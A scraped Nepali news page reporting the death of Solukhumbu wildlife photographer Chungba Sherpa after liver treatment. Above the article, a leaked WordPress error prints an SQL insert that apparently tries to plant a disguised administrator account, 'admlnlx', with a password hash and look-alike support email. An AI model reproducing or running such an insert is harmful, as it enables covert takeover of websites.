WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNhrIr7TfX8.5xbFbCKIf3mPCJoj3b.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 14:39:41', '', 'admlnlx', 'admlnlx')
काठमाडौं । सोलुखुम्बुका चर्चित वाइल्डलाइफ फोटोग्राफर चुङ्बा शेर्पाको निधन भएको छ । आइतबार राति १२ः१५ बजे ग्रान्डी अस्पतालमा उपचारको क्रममा निधन भएको हो ।
खुम्बु पासाङल्हामु गाउँपालिका–१ लुक्ला स्थायी ठेगाना भएका ६४ बर्षिया शेर्पा कलेजोसम्बन्धी समस्याका कारण एक सातादेखि उपचाररत थिए ।
उपचारकै क्रममा शेर्पाको निधन भएको उहाको पारिवारिक श्रोतले बताए ।